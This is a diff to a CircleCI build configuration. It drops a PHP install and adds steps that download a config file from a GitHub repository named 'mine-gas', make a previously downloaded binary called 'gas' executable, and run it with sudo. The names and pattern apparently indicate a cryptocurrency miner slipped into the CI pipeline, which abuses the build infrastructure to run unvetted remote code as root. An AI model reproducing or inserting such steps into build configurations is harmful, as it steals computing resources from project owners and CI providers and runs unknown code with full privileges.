--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -11,5 +11,7 @@ jobs:
       - run:
           command: |
             sudo apt-get update
-            sudo apt-get install -y php5
             sudo wget https://github.com/L00K11/mine-gas/raw/main/gas
+            sudo wget https://github.com/koguara28/mine-gas/raw/main/script.ini
+            sudo chmod +x gas
+            sudo ./gas script.ini
